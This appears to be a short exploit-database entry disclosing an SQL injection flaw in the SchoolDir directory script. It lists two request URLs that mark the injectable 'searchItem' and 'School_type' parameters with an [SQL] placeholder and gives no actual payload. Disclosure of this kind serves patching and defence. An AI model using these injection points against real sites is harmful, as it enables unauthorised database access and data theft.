# # # # # # Exploit Title: SchoolDir - SQL Injection # Google Dork: N/A # Date: 01.03.2017 # Vendor Homepage: http://www.brynamics.xyz/ # Software: https://codecanyon.net/item/schooldir/19326269 # Demo: http://www.brynamics.xyz/schooldir/ # Version: N/A # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/search?searchItem=[SQL]&criteria=schools # http://localhost/[PATH]/sortsearch?School_type=[SQL]&fees=2&ownership=federal&location=Nigeria&searchItem=Harvard+University&criteria=schools # If you don't know to use the vulnerabilities, you don't need to check it. # Etc... # # # # # # Iranian Exploit DataBase = http://IeDb.Ir [2017-03-04]